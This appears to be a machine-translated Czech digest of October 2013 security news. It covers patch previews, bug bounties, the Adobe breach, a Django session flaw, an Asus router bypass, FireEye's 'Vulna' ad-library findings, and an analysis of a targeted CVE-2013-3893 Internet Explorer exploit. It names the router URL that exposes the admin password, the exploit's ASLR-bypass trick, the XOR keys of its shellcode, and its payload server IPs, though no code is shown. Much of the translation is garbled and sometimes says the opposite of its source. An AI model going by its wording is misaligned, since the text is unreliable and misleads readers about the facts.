MS13-087 Chyba zabezpečení v Silverlight může umožnit přístup k informacím
(Nahrazuje MS13-052 )
Silverlight CVE-2013-3896
KB 2890788 Ne. Závažnost: Důležité
zneužitelnosti: 3 Důležitý Méně důležité
Budeme aktualizovat problémy na této stránce asi týden nebo tak, jak se vyvíjejí. Vážíme aktualizace se sídlem v USA mohou zákazníci volat Microsoft zdarma opravy související podpory na čísle 1-866-PCSAFETY


Router chyba by mohla neprozrazuje citlivé Konfigurace Heslo Informace
8.10.2013 Zranitelnosti | Bezpečnost
Tchajwanský výrobce elektroniky Asus vydala aktualizaci pro jednu ze svých směrovačů, které koriguje ověřovací bypass chybu objevenou v zařízení přes léto.

Tato chyba zabezpečení je v RT-N10E značky ASUS routerů, prodávány především v Evropě, Číně a Jižní Americe.

Podle poznámky na Carnegie Mellon je Vulnerability Database Poznámky CERT pátek pozdě, problém je, že jakmile přístupem útočník získá do zařízení, mohou dělat jejich cestu k určité webové stránky a dozvědět se nastavení zařízení bez zadání přihlašovacích pověření.

Místo, http://RouterIPAddress/qis/QIS_finish [.] Htm, účtuje sebe jako nejkomplexnější databáze Router a je běžně používán koncovými uživateli k informacím výzkumu routeru a nastavení po celém světě.

Chyba (CVE-2013-3610) umožňuje útočníkům zobrazení informací - včetně zařízení hesla správce - to by mělo být pouze viditelná pro ověřené uživatele tím, že na místní síti.

Aktualizace firmware 2.0.0.25 opravuje zranitelné verze, 2.0.0.24 a dříve a také dvě další, nesouvisející problémy týkající se za "abnormální odpojení" a problém s "stabilitou připojení IPTV po PPPoE připojení."

Ti, kteří nemají zájem o aktualizaci lze použít řešení: Omezení přístupu k síti směrovače systém rozhraní webu.


Vědci Nab $ 28k na Bounty Bug Microsoft Office
8.10.2013 Zranitelnosti | Bezpečnost
V rámci svého vůbec prvního nájemného programu Microsoft vyplatila 28.000 dolarů na malou skupinu vědců, kteří objevili a hlášeny chyby v aplikaci Internet Explorer 11. IE 11 Bounty Program běžel pouze po dobu jednoho měsíce v létě, ale to přitahovalo řadu příspěvků od známých výzkumných pracovníků.

Chyba Microsoft Bounty Program pro IE 11 byla zahájena v červnu a skončila na konci července, během náhledu období prohlížeči. Vědci, kteří hlášeny chyby v nejnovější verzi společnosti prohlížeči měli možnost získat až 11000 dolarů. Žádný z vědců, kteří předložili chyby během IE 11 oknu přiblížil odměnu na této úrovni, s nejvyšší platba je 9400 dolarů Jamese Forshaw pro čtyři zranitelnosti objevené v IE a bonus za nalezení nějaké chyby IE designu.

Microsoft věrnostní program byl vyhlášen v červnu po mnoha letech spekulací výzkumníky bezpečnosti o firmě záměry. Microsoft úředníků řekl v minulosti, že společnost nemusela platit odměny za chybami zabezpečení, protože mnozí badatelé přišli přímo společnosti Microsoft s podrobnostmi o nových zranitelností. Že stav se změnil v průběhu posledního roku nebo tak nějak, což vede společnost Microsoft k vytvoření vlastního vzít na programech chyb nájemných běží mnoha jiných dodavatelů softwaru.

Na rozdíl od Google, PayPal a další, Microsoft je na programu mimo IE 11-odměna je především zaměřena na placení za inovativní útočných technik. Firma nabízí jak hodně jak $ 100,000 útočných technik, které jsou schopné obejít nejnovější technologie Exploit zmírnění na nejnovější verzi systému Windows. Tento program stále probíhá.

Mezi jinými výzkumníky, kteří dostávali odměny od společnosti Microsoft v IE 11 programu jsou Peter Vreugdenhill z Exploit inteligence, Fermin J. Serna Google, Masato Kinugawa, Ivan Fratric společnosti Google a Jose Antonio Vazquez Gonzalez z Yenteasy bezpečnostního výzkumu.

28.000dolar Microsoft zaplatil během IE 11 programu není velké číslo ve velkém schématu věcí, a to zejména ve srovnání s desítkami tisíc dolarů Google vyplácí pravidelně pro chyby Chrome. Ale vědci, kteří podali chyby programu je dobré znamení, že bezpečnostní komunita s Microsoft programu vážně, i přes relativně nízké platby k dispozici.


Zranitelné a agresivní adware ohrožuje miliony
7.10.2013 Zranitelnosti | Viry

FireEye objevil nový mobilní hrozby z populární reklamní knihovny, že žádný jiný antivirový nebo dodavatelem zabezpečení, který byl veřejně oznámen dříve. Mobilní reklamní knihovny třetí strany, včetně softwaru hostitelské aplikace za účelem zobrazování reklam. Protože tato knihovna je funkčnost a zranitelnosti mohou být použity k provedení rozsáhlých útoků na miliony uživatelů, máme na mysli to anonymně krycím názvem "Vulna" spíše než odhalil svou identitu. Analyzovali jsme všechny Android aplikace na více než jeden milion stažení na Google Play, a zjistili jsme, že více než 1,8% z těchto aplikací používá Vulna. Tyto postižených aplikace byly staženy více než 200 milionů krát v celkem. Ačkoli to je všeobecně známo, že reklamní knihovny představují rizika pro soukromí, jako je shromažďování identifikátory zařízení (IMEI, IMSI, atd.) a informace o poloze, Vulna představuje daleko závažnější problémy se zabezpečením. Za prvé, Vulna je agresivní, pokud instruován svým serverem, bude shromažďovat citlivé informace, například textové zprávy, telefonní hovor, historie a kontakty. Provádí také nebezpečné operace, jako je provedení dynamicky stažený kódu. Za druhé, Vulna obsahuje řadu různých chyb. Tyto chyby zabezpečení při využívány útočníkovi dovolit využít Vulna je riskantní a agresivní funkce provádět nebezpečné činnosti, jako je zapnutí fotoaparátu a fotografování bez vědomí uživatele, krást dvoufaktorová autentizace tokeny odeslané přes SMS, nebo otočením zařízení do části . botnet . Jsme mince termín "vulnaggressive" k popisu této skupiny zranitelných a agresivní vlastnosti Následuje ukázka z agresivní chování a zranitelnosti jsme objevili v Vulna. Agresivní chování:

Kromě sběru informací používané pro cílení a sledování, jako jsou identifikátory zařízení a umístění, jak mnoho reklamních knihovny dělat, Vulna také shromažďuje k zařízení majitele e-mailovou adresu a seznam aplikací nainstalovaných v zařízení. Dále Vulna má schopnost číst textové zprávy, telefonní hovor historii a seznam kontaktů, a sdílet tato data veřejně bez jakékoliv kontroly přístupu přes webové služby, která začíná na zařízení.
Vulna stáhne libovolný kód a spustit jej, pokud pokyn vzdáleného serveru.
Chyby:
Vulna přenese uživatele soukromých informací prostřednictvím protokolu HTTP ve formátu prostého textu, které je náchylné k odposlechu útoky.
Vulna také používá nezabezpečený protokol HTTP pro příjem příkazů a dynamicky namáhané kód z jejího kontrolního serveru. Útočník může převést Vulna do botnetu při napadání jeho provoz HTTP a slouží škodlivé příkazy a kód.
Vulna používá Androidu Webview s JavaScript k Java vázání v nezabezpečeném způsobem. Útočník může tuto chybu zabezpečení zneužít a slouží škodlivý kód JavaScriptu provádět škodlivé činnosti na zařízení. Tato chyba zabezpečení je instance společného JavaScript závazné zranitelnosti, která byla podle odhadu ovlivnit více než 90% zařízení se systémem Android.
Vulna je agresivní chování a zranitelnosti vystavit Android uživatele, zejména podnikovým uživatelům, k vážným bezpečnostním hrozbám. Využitím Vulna je vulnaggressive chování, mohl by útočník stáhnout a spustit libovolný kód na zařízení uživatele v rámci hostitelské aplikace Vulna je. Z naší studie, mnoho hostitelské aplikace obsahující Vulna mají silné oprávnění, které umožňují ovládání kamery, čtení a / nebo zápis SMS zpráv, telefonního hovoru historie, kontakty, historie a záložek prohlížeče a vytvoření ikony na domovské obrazovce. Útočník by mohl využít tyto obecné oprávnění k provedení škodlivé akce. Můžete například útočníci:
krást dvoufaktorové autentizační token zaslané prostřednictvím SMS
prohlížet fotografie a další soubory na SD kartě
instalaci ikony, které v oblasti phishingových útoků na domovské obrazovce
odstranit soubory a zničit data na vyžádání
vydávat majitele a posílat textové zprávy padělaných k obchodním partnerům
vymazat příchozí textové zprávy bez uživatelova předchozího upozornění
hovory místo telefonu
používat fotoaparát fotit bez předchozího upozornění uživatele
číst záložky nebo změnit upozornit na podvodné stránky.
Existuje mnoho možných způsobů Útočník by mohl zneužít Vulna zranitelná místa. Jedním z příkladů je veřejné Wi-Fi únosu: Když oběti připojení zařízení k veřejné Wi-Fi hotspot (například v kavárně nebo na letišti), útočník poblíž mohl odposlouchávat provoz Vulna je a aplikovat škodlivé příkazy a kód. Útočníci mohou také provádět DNS únos k útoku uživatelů po celém světě, jak v syrském elektronických nedávných útoků armády zaměřených na Twitter, The New York Times a Huffington Post. V DNS únos útoku, útočník by mohl změnit záznamy DNS serverů reklamních Vulna je přesměrovat návštěvníky na své regulační serveru, za účelem získání informací z nebo poslat škodlivé příkazy Vulna na oběti zařízení. Navzdory vážným hrozbám, které představuje, Vulna je nenápadný a těžko odhalit:

Vulna přijímá povely od svého reklamního serveru pomocí data zakódovaná v polích záhlaví HTTP místo v těle HTTP odpovědi.
Vulna zatemňuje její kód, který dělá tradiční analýza obtížné.
Vulna je chování může být obtížné spustit pomocí tradiční metody analýzy. Například, v jedné oblíbené hry, je Vulna provedena pouze v určitých místech ve hře, například při dosažení určité úrovně, jak je znázorněno na obrázku níže. (Údaj byl částečně rozmazané skrýt identitu app.) Při spuštění Vulna, jediný efekt viditelný pro uživatele je reklama v horní části obrazovky. Nicméně, Vulna tiše vykoná své rizikové chování v pozadí.
FireEye Mobile Threat Prevention uplatňuje jedinečný přístup a technologii, která umožnila odhalit bezpečnostní problémy popsané v tomto příspěvku, rychle a přesně přes tyto výzvy. Poskytli jsme informace o zjištěných bezpečnostních problémů, seznam zatížených aplikací a náměty jak Google a prodejce Vulna. Potvrdili problémy a jsou aktivně ji řešit. Závěrem jsme objevili nový mobilní hrozby z populární reklamní knihovny (s kódovým označením "Vulna" o anonymitu). Tato knihovna je součástí populárních aplikací na Google Play, které mají více než 200 milionů stažení celkem. Vulna je instancí rychle rostoucí třídě mobilní hrozby, které jsme nazval vulnaggressive ad knihovny. Vulnaggressive reklamní knihovny jsou znepokojivě agresivní na shromažďování citlivých údajů uživatelů a vkládání schopnosti vykonat nebezpečné operace na požádání, a také obsahují různé třídy chyb, které umožňují útočníkům využít jejich agresivní chování k harm uživatelům. App vývojáři pomocí těchto knihoven třetích stran často nejsou vědomi bezpečnostních otázkách v nich. Tyto hrozby jsou zvláště závažná pro podnikové zákazníky. Navíc, tento vulnaggressive charakteristika není omezen jen na reklamních knihoven, se vztahuje také na jiných výrobců komponent a aplikací. Autoři: Tao Wei, Dawn Song, Yulong Zhang Hui a Xue z FireEye.


Microsoft představí osm bulletinů v úterý
6.10.2013 Zranitelnosti
Října se ukazuje, že bude rušný měsíc záplat. Příští týden je Patch Tuesday, a jak Adobe a Microsoft zveřejnily své předběžné oznámení, s jedním a osmi bulletiny, resp. Navíc, 15. října jsme stále kritickou Patch Update z Oracle, která bude obsahovat novou verzi softwaru Oracle Enterprise, plus nové verze Java 7.

Tento měsíc také znamená 10-ti letého výročí programu Patch Tuesday, které společnost Microsoft začala v říjnu 2003. Během posledních deseti let, se stala vzorem realizace opravy programu jak na dosah zranitelnosti zadavatelů a předvídatelnost pro IT administrátory, kteří byli zabývající se rostoucím počtu záplat pro jejich počítačové infrastruktury. Tým společnosti Microsoft je profesionální a radost pracovat, když máme implementační otázky nebo potřebujete základní informace o možnostech zmírnění. Nicméně, Microsoft má turbulentní dva týdny od svého bezpečnostního poradenství KB2887507 , který popsal CVE-2013 - 3893, 0 denní zranitelnost v aplikaci Internet Explorer, která byla použita pro cílených útoků v Asii. Od té doby jsme viděli výzkum , který spojuje exploit na malware již v srpnu. Bylo také zprávy o zneužití začínají být použit v rozšířenější způsobem jinými cybercriminal skupiny, a jeho uvolnění jako modul Metasploit tento týden. Řešení (Fix-It) je k dispozici od 17. září. , ale tato situace je nyní vyřešen: Bulletin č. 1 je určena pro aplikaci Internet Explorer a řeší nedávné 0-day. To je jistě nejvyšší prioritou patch pro příští týden, a to má vliv na všechny verze aplikace Internet Explorer 6-11. Naštěstí útok objem pomocí této chyby zabezpečení je i nadále nízká a to vzhledem Microsoft příležitost udělat úplný zkušební cyklus na všech možných kombinací operačních systémů a cílových míst. Bulletin # 2, # 3 a č. 4 jsou kritické a adresa chyby v operačních systémech Windows, počínaje Windows XP a včetně Windows 8 a Windows RT. Bulletiny # 6 a # 7 zabývat důležitými chyby v aplikaci Microsoft Excel a Microsoft Word. Oba se zdají být soubor ve formátu chyby, které poskytují vzdálené spuštění kódu při otevření souboru. Měly by být vysoko na seznamu patchů jako útočníci často používají tyto chyby v přílohách k dobře napsané e-maily, které si často otevřených oslovených stran. Bulletin č. 5 řeší významnou chybu zabezpečení v systému Windows Server Sharepoint a bude důležité, zejména pokud vystavujete Sharepoint na internetu. Bulletin # 8 řeší chybu zabezpečení v vyzrazení informací Silverlight a je nejméně naléhavá z osmi záplat. Adobe vydává novou verzi aplikace Adobe Reader a Acrobat XI XI běžící pod Windows, která řeší kritické chyby zabezpečení. Co se týče vědí, je zranitelnost není používán ve volné přírodě pro všechny útoky. Autor: Wolfgang Kandek, CTO, Qualys.


Microsoft připravuje osm záplaty, IE Zero Day Fix v říjnu Patch Tuesday

4.10.2013 Zranitelnost | Hacking
Společnost Microsoft oznámila, že plánuje vydat osm záplaty příští týden v rámci svého října Patch Tuesday propuštění řešit nedostatky ve svých operačních systémech Windows,. NET Framework Office, Server, Silverlight a co je nejdůležitější jeho prohlížeče Internet Explorer.

Čtyři z patche jsou označeny kritické, včetně té první, která by měla řešit nepříjemný zero day chybu, která byla postihující všechny verze aplikace Internet Explorer za poslední měsíc nebo tak nějak. Microsoft původně vydala fixit nástroj pro zranitelnosti před třemi týdny poté, co zprávy o zneužití bylo vidět ve volné přírodě, ale toto je první patch pro vydání bude společnost dodávat uživatelům.

Chyba pramení z toho, jak IE "přistupuje objekt v paměti, který byl odstraněn nebo nebyl řádně přiděleny. Tato chyba zabezpečení může dojít k poškození paměti takovým způsobem, který by mohl útočníkovi umožnit spuštění libovolného kódu v kontextu aktuálního uživatele v aplikaci Internet Explorer ", podle poradní Microsoft vydala v polovině září .

To netrvalo dlouho pro veřejnost využít zranitelnosti je unikly využívat kódu. Ve stejný den, kdy Metasploit vyvinut modul pro zranitelnosti , přišla zpráva, že tři nové kampaně cílené útoku byly pomocí exploitu vektor.

Přes nárůst počtu útoků, Microsoft zřejmě rozhodl se držet harmonogramu pro sporné chybu a ne spravit s out-of-band patch.

Bez ohledu na časové ose podle několika odborníků, mělo by to být náplast problém číslo jedna pro uživatele a IT profesionály v úterý.

"Uživatelé by měli použít opravu co nejdříve," Lamar Bailey, ředitel bezpečnostního výzkumu a vývoje pro zabezpečení sítě společnosti Tripwire, řekl ve čtvrtek.

Ostatní tři kritické aktualizace (Bulletiny 2-4) vyřeší problémy jinde v systému Windows, od Windows XP na Windows 8 a Windows RT.

Mezitím, aktualizace systému Microsoft Office (Bulletiny 5-7) stanoví důležité chyby v SharePoint, Excel a Word, odpovídajícím způsobem.

Všechny tyto chyby zabezpečení by mohlo vést ke vzdálenému spuštění kódu, s výjimkou posledního chyby, ty nejnepatrnější, že řeší informacím chybu s jejím rámci aplikace Silverlight.

To samozřejmě znamená 10 tý rok Patch Microsoft sanace vady Úterý programu. Pohyb - alespoň podle slov bouří Andrew ve středu - vytvoření "velkou vlnu změn" v oblasti informační bezpečnosti od toho bodu na.


Adobe porušena, Acrobat a ColdFusion kód Ukradené Spolu s 2.9m záznamů o zákaznících

4.10.2013 Hacking | Zranitelnosti | Incidenty
Útočníci přístup zákazníků ID, šifrovaných hesel, stejně jako zdrojový kód pro řadu produktů Adobe, Adobe šéf bezpečnosti Brad Arkin oznámil .

Arkin uvedl Adobe spolupracuje s policií na závažnosti porušení, v němž útočníci přístupný zdrojový kód pro Adobe Acrobat, ColdFusion, ColdFusion Builder a případně jiné produkty Adobe.

"Na základě našich poznatků, k dnešnímu dni, nejsme vědomi žádné konkrétní zvýšené riziko pro zákazníky v důsledku tohoto incidentu," Arkin uvedl v prohlášení.

Arkin tzv. útoky na síti Adobe "sofistikovaný", a že informace o 2,9 milionu zákazníků byl odstraněn od společnosti strojů, včetně jména zákazníků, šifrované kreditních a debetních karet, vypršení data a další informace používané v zákaznických objednávek.

"V tuto chvíli se nedomníváme, odstraněné útočníci dešifrovat kreditní nebo debetní karty čísla z našich systémů," říká Arkin. "Hluboce litujeme, že tento incident."

Arkin uvedl Adobe není vědoma žádných zero-day využije použité v útoku, ale doporučuje zákazníkům provozovat pouze podporované verze produktů Adobe a zajistit patch levels jsou aktuální. Řekl, že uživatelé by rovněž měli sledovat pokyny jsou dostupné v Acrobat Enterprise Toolkit a ColdFusion Lockdown Guide.

"Tyto kroky mají pomoci zmírnit útoky na starší, neopravených nebo nesprávně nastavený nasazení produktů společnosti Adobe," řekl Arkin.

Adobe řekl, že je resetování hesla zákazníky , aby se zabránilo další přístup k zákaznických účtů. Retinované zákazníci budou informováni prostřednictvím e-mailu s informacemi o tom, jak změnit svá hesla, Arkin řekl.

Dodal, že Adobe se také pracuje na oznámení zákazníků, jejichž platební karta informace byly přístupné. Oznámení dopisy jdou ven s doplňujícími informacemi týkající se ochrany osobních údajů. Adobe uvedla, že nabízí zákazníkům za jeden rok zdarma úvěrového monitoringu.

Arkin připočítán bezpečnostní zpravodaj Brian Krebs a ​​Alex Holden Hold, bezpečnostní LLC, který je upozorňuje na potenciální problém a pomoci s odpovědí. Krebs dnes oznámila, že se dozvěděla o úniku zdrojového kódu před týdnem, když zjistil, 40GB dat Adobe na stejném serveru, používaného zločinci zapojenými do LexisNexis, Dun & Bradstreet a Kroll porušení letos.

"Hacking týmu serveru obsahovala obrovské repozitáře nezkompilovaný a zkompilovaný kód, který se objevil jako zdrojový kód pro aplikaci ColdFusion a Adobe Acrobat," Krebs napsal dnes.

Krebs řekl, Adobe se domnívá, útočníci popraskané zdrojového kódu úložiště v polovině srpna po přístupu k části sítě, Adobe, která zpracovává transakce kreditní kartou.

Krebs má také screenshot kódu Acrobat z úložiště, včetně kódu od dosud nevydaných vlastností produktu.

"Jsme stále ve fázi brainstorming přijít se způsoby, jak poskytnout vyšší míru jistoty pro integritu našich produktů, a že to bude klíčovou součástí naší reakce," řekl Krebs Arkin. "Těšíme se na malware analýzy a zkoumání různých digitálních aktiv, které máme. Právě teď vyšetřování je opravdu na stopu strouhanky o tom, kde se protivníci dotkl. "


Chyba zabezpečení v Django může povolit Útočníci Přístup k Cookies
4.10.2013 Zranitelnosti | Hacking | Bezpečnost | Incidenty

Chyba zabezpečení ve webovém rámcové Django může usnadnit útočník ukrást uživatele cookie a přihlásit na svých internetových stránkách, i poté, co jste odhlášeni.

Zasedání zneplatnění zranitelnost byla objevena GS McNamara, stejný výzkumník, který vykopal podobnou chybu zabezpečení v Ruby on Rails Web App rámce v září.

Stejně jako Rails, Django umožňuje uživatelům rozhodnout, kde chtějí ukládat data relace uživatele. I když není výchozí, jednou z možností je cookie storage, který McNamara poznámky, ukládá všechny data relace v cookie a podepíše jej.

"Výchozí název souboru cookie relace je" sessionid "bez ohledu na to, zda cookie uloží pouze identifikátor relace, nebo kompletní data relace, hash," McNamara vysvětluje v blogu na své MaverickBlogging.com webových stránkách v pondělí.

McNamara konstatuje, že ve srovnání s Rails, je to trochu složitější určit, kteří uživatelé skladovací zasedání zavedlo, ale pokud uživatel byl pomocí relací využívajících soubory cookie a útočník má přístup k tomuto počítači, i když byl uživatel přihlášen ven, mohli najít, ukrást nebo zachytit, že cookie a snadno získat přístup tomuto uživateli internetových stránkách.

Django je open source webový aplikační framework, který pomáhá uživatelům vytvářet webové aplikace, běží na Python byl naposledy aktualizován jen dva týdny .

McNamara, který sídlí ve Washingtonu, upozornil Django vývojáři o zranitelnosti, ale nezní to jako oprava je na obzoru.

Místo toho se skupina na starosti rámce, Django Software Foundation je, že se rozhodnete upozornit uživatele o bezpečnostních dopadech spojených s relací využívajících soubory cookie.

"Na rozdíl od jiných zasedání backends které udržují server-side záznam každého zasedání a zánik, když se uživatel odhlásí, jsou založené na cookie relace není vyvráceno, když se uživatel odhlásí. Pokud tedy útočník ukradne uživatele cookie, on nebo ona může využít této cookie se přihlásit jako tento uživatel, i když se uživatel odhlásí, "uvádí novou poznámku o tom, jak používat sezení na místě Django .

Když dosáhl Středa, Carl Meyer, přispěvatel Django a členem jejího základního týmu, uznal skupina nemá v úmyslu provádět žádné další změny způsobu zpracování cookie relace skladování a dodal, že "by si vyžádala ověření relace proti serveru -uložené informace o každé žádosti ", a že v tomto okamžiku může uživatel stejně dobře použít server-side relace namísto na základě souboru cookie relace.

Podle Django, je to pro vývojáře vyhodnotit další riziko ukládání cookie relace "a zvážit výhody a nevýhody jejich použití."

McNamara stále doufá, že bude pracovat s Django, pokud jde o zvýšení bezpečnosti svých internetových rámec do budoucna. V e-mailu na Threatpost ve středu tvrdil, že jsou stále přetrvávající problémy s ohledem na [Django je] na základě souboru cookie relace skladování.

"Myslím, že je to riziko, že byl odepsán bez dostatečné dokumentace nebo varování," řekl McNamara.


Adobe Příprava kritické záplaty Reader, Acrobat Následující týden
4.10.2013
Zranitelnosti

Adobe oznámila, že plánuje opravu kritické chyby ve dvou výrobků, Adobe Reader a Acrobat XI (11.0.04) pro Windows, příští týden v rámci svých měsíčních aktualizací Patch úterý.

Adobe průběžně informovat o blížícím se aktualizace včera na své Incident zboží Security Response Team (PSIRT) blog s tím, že zatímco chyby jsou označeny kritické, pokud jde o společnost ví, nejsou tam žádné známé exploity v přírodě pro ně.

Aktualizace pro Acrobat a Reader dostaly Priority 2, který znamená, že produkty byly v minulosti na to, co společnost nazývá zvýšené riziko . Obě opravy by měly jít žít 8 října v tandemu s 10-ti letého Microsoft Patch Tuesday .

Je to první aktualizace Reader a Acrobat, protože minulý měsíc to, APSB13-22 , který oslovil několik slabých míst, včetně těch, na zásobník, vyrovnávací a přetečení celého čísla rozmanitosti, spolu s paměťovou korupce chyby.

Budeme muset počkat do úterý, kdy Adobe Příspěvků svůj měsíční bulletin zabezpečení, který přesně ví, co vady říjnové záplaty opravit.


Zdokonalený Yahoo Bug Bounty Program na cestě T-košile není v ceně
4.10.2013
Zranitelnosti

Yahoo slíbil dotvářejí na nové zranitelnosti zpráv a odměny politiky podle Halloween po ocitá v urputných bojích mini skandálu tento týden přes dvě 12,50 dolarů firmy kódů Yahoo obchod zlevněných vydaných jednomu pracovník v poděkování za otáčení v páru z cross-site scripting chyby.

Výzkumník v otázce High-Tech Bridge CEO Ilia Kolochenko, vyzval Yahoo "revidovat své vztahy" s bezpečnostní komunitou po sdílet svůj příběh . Kolochenko, stejný bug-lovec, který hlásil XSS chyby v aplikaci NASDAQ webové minulý měsíc, sdílení informací s Yahoo k řadě bezpečnostních otázek, bylo zjištěno na několika Yahoo domén. První byl cross-site scripting chyba na marketingsolutions.yahoo.com hlášeny a uznal Yahoo, který informoval Kolochenko tato otázka již byla nahlášena jiným výzkumníka.

Kolochenko řekl nasadit a pět dní později, oznámila Yahoo tří dalších XSS zranitelnosti na ecom.yahoo.cocm a adserver.yahoo.com domén.

"Každý z objevených zranitelností povolena jakákoliv yahoo.com e-mailový účet musí být ohrožena tím, že prostě odeslal speciálně vytvořený odkaz na přihlášeného uživatele Yahoo a dělat mu / jí [klikněte] na tom," řekl Kolochenko.

Yahoo, Kolochenko řekl, odpověděl během dvou dnů a odměnil ho 25 dolarů slevový kód na prodejně společnosti Yahoo. Toto nesedělo s výzkumníka.

"Platební několik dolarů za zranitelnosti je špatný vtip a nebude motivovat lidi hlásit chyby zabezpečení s nimi, zvláště když se tyto chyby mohou být snadno prodáno na černém trhu za mnohem vyšší cenu," řekl. "Nicméně, peníze nejsou jedinou motivací bezpečnostních výzkumníků."

Kolochenko ukázal bug bounty Google jako příklad věrnostního programu, který platí značné částky, a také udržuje "Hall of Fame", hraje se ega výzkumných pracovníků, jakož.

"Pokud Yahoo nemůže dovolit utrácet peníze na své firemní bezpečnosti, měl by se alespoň pokusit přilákat výzkumné pracovníky bezpečnostních jinými prostředky," řekl Kolochenko. "V opačném případě nemůže být žádný z uživatelů Yahoo někdy pocit bezpečí."

Yahoo bezpečnostní ředitel týmu Ramses Martinez reagoval včera uvedl, že Yahoo je rychlé nápravě chyby hlášené do svého týmu, ale že uznání a odměny proces a politika byla pomalu blíží.

Martinez uznal Kolochenko tísně v náhledu připravované revidované politiky, řekl odmění jedince, kteří identifikují "nové, jedinečné a / nebo vysokým rizikem problémů" s výplaty v rozsahu 150 dolarů 15.000 dolarů.

"Částka," řekl Martinez, "určí jasnou systém založený na souboru definovaných prvků, které zachycují závažnost problému."

Martinez také řekl, že nová politika bude uvolněna 31.října, a že veškeré výplaty bude probíhat zpětně na 1. července. Dříve Martinez osobně uznal podání s Yahoo T-shirt-které řekl, že osobně zaplatil, stejně jako osobní dopis, v němž výzkumník potvrzuje najít.

"Pokud se nám něco a my reagovali s potvrzením (a pravděpodobně t-shirt) po 1. červenci, budeme znovu s vámi o tento nový program," řekl Martinez. "To zahrnuje samozřejmě kontrola pro výzkumníky v High-Tech most, který neměl rád moje tričko."

Martinez řekl nový Yahoo zpráv program klade důraz na zlepšení procesu podávání zpráv pro výzkumné pracovníky prostřednictvím nové webové stránky, který on říkal by měly zlepšit Yahoo interní validaci a nápravné procesy. Jakmile problém je potvrzen, řekl Martinez výzkumník budou kontaktováni do 14 dnů ode dne podání a poskytne tuto osobu s formálním uznáním e-mailem nebo písemně dopisem a výzkumným bude rovněž uznána v jakési "síň slávy," řekl řekl.


Cílená zneužití

4.10.2013 Zranitelnosti | Analýza

V září Microsoft publikoval informace o novém Internet Explorer zranitelnosti - CVE-2013-3893. Tato chyba zabezpečení se týká verze IE 6 až 11 pro platformy systému Windows XP přes systém Windows 8.1. Později, v září, společnost vydala opravu zavírání zranitelnost.

Počítačoví zločinci jsou rádi, že takové využití chyby, protože jsou snadno zpeněžit - Internet Explorer je stále populární.

Top 5 prohlížeče podle http://gs.statcounter.com

Tento typ zranitelnosti je velmi nebezpečné, protože umožňuje spuštění libovolného kódu na cílovém systému. Na konci září jsme zjistili, exploit pro zranitelnosti, která využívá útok používání po volném typu proti vykreslování HTML v aplikaci Internet Explorer v motoru mshtml.dll.

Nedávno jsme zjistili, že modifikace zneužití byl použit v cílených útoků proti řadě vysoce postavených organizací v Japonsku.

Cílený útok

Tato chyba je využíván pouze na ty počítače, které jsou součástí konkrétní podsítě sítí cílových organizací:

Definování podsítí, ve kterém bude počítač být napaden

Jestliže je IP adresa počítače patří k jednomu z rozsahů definovaných zločinci, bude možné tuto chybu zabezpečení zneužít poté, co uživatel navštíví infikovanou webovou stránku.

Jsou získány následující informace v první fázi útoku:

Operační systém verze
Internet Explorer verze
Jazyk používaný OS
Ať už je nainstalován Microsoft Office
Využít zvolí vhodný ROP řetěz a shell kód na základě údajů získaných v této fázi:

Volba ROP řetězce a shellcode

Stojí za zmínku, že exploit nebude fungovat na těchto systémech Windows 7, které nemají nainstalován Microsoft Office.

Kontrola verzi operačního systému a zda je nainstalován Microsoft Office

To je proto, že dnešní operační systémy obsahují mechanismy, které činí využití zranitelností obtížnější. Jedním z těchto mechanismů je ASLR (Address Space Layout randomizace). Využít používá chytrý trik vyhnout mechanismus: načte modul kompilovaný bez podpory ASLR do kontextu prohlížeče procesu - hxds.dll knihovny.

Kód po provedení, který je načten hxds.dll

Knihovna, která je součástí balíku Microsoft Office nepodporuje ASLR. To je naloženo na známých adresách v paměti,po které útočníci používají technologii ROP označte paměť obsahující shell kódu jako spustitelný soubor.

Následující shell kód je vykonáván po zranitelnost byla úspěšně zneužil:

To může být viděno na obrázku výše, že shell kód dekóduje její hlavní část pomocí 0x9F jako klíč.

Po dešifrování kódu vyhledá funkcí potřebných stáhnout a spustit náklad, najít podle jejich hashe:

Hash použitých funkcí

Po dokončení hledání potřebných adres, zobrazí se následující činnost probíhá:

škodlivý objekt s názvem "runrun.exe" je stažen ze serveru útočníků:

Stahování na náklad

Vzhledem k tomu, stáhnout modul je šifrována, shell kód načte z disku a dešifruje ji pomocí 0x95 jako klíč, po které se spouští dešifrovaný modul:

Dešifrování stažený modul

Distribuce exploitu

Jak již bylo uvedeno výše, cílené útoku použít pouze na jednu změnu zneužití pro CVE-2013 - 3893. Ve stejné době, celkový počet změn objevil dosud činí 21. Útoky využívající tuto chybu většinou byly zjištěny na Tchaj-wanu:

Máme následující informace o serveru, ze kterého exploit je užitečná byly staženy:

Server

Kraj

211.23.103.221

Tchaj-wan

210.177.74.45

Hong-Kong

192.192.91.6

Tchaj-wan

61.63.47.27

Tchaj-wan

Stručná analýza jednoho z užitečného zatížení variantách ( md5 - 1b03e3de1ef3e7135fbf9d5ce7e7ccf6 ) ukázala, že spustitelný modul má šifrovaná data ve svých zdrojích:

Šifrovaných dat obsažených v datovém zdroji je

Spustitelný modul extrahuje data a převádí jej na modulu DLL:

Extrakce šifrovaná data

DLL vytvořené konverzí dat získaných z užitečného zatížení je zapsán na disk pomocí následující cestu:
TempPath \ tmp.dll ( md5 - bf891c72e4c29cfbe533756ea5685314 ).

Knihovna exportuje následující funkce:

Funkce vyvážené tmp.dll

Pokud se knihovna byla zapsána na disk, je vložen do adresového prostoru procesu a ishk vyvážené funkce se nazývá:

Volání ishk exportovat funkci

Knihovna sama provádí injekci do jiného adresového prostoru procesu.

Po spuštění malware komunikuje se serverem v Jižní Koreji. Následující požadavky jsou odesílány z infikovaného stroje:

Žádosti odeslané z infikovaného počítače

Kaspersky Lab detekuje užitečné zatížení stažený jako Trojan-Dropper.Win32.Injector.jmli.

Zjistíme exploit jako HEUR: Exploit.Script.Generic.


Října Patch Tuesday Preview (CVE-2013-3893 oprava přichází!)

4.10.2013 Zranitelnosti

Zatím máme pre-oznámení od společnosti Microsoft a Adobe.

Microsoft slibuje, 8 bulletiny, rozdělené rovnoměrně mezi kritické a důležité. Kritické bulletiny u systémů Windows, Internet Explorer a rozhraní. NET Framework, zatímco důležité bulletiny vliv Office a Silverlight.

Tak to zní jako průměr, velmi těžký klient Patch Tuesday. Na konci serveru, jsou ovlivněny pouze Sharepoint Server (opět) a Office Server.

